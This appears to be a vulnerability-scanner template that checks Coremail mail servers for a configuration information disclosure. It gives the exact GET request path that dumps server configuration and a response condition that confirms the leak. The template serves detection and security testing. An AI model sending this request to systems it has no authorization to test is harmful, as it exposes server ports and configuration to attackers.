name: Coremail_configuration_information_disclosure
transport: http
set: {}
detail:
  dock: app="Coremail"
  product: Coremail
  homepage: https://www.coremail.cn/
  impact: <p>There is a configuration information leakage vulnerability in an interface
    of COREMAIL, including port, configuration information, etc<br></p>
  description: There is a configuration information leakage vulnerability in an interface
    of COREMAIL, including port, configuration information, etc
rules:
  r1:
    method: GET
    path: /mailsms/s?func=ADMIN:appState&dumpConfig=/
    follow_redirects: false
    headers: {}
    expression: response.status == 200 && response.body.bcontains(b'configHome')
expression: r1()
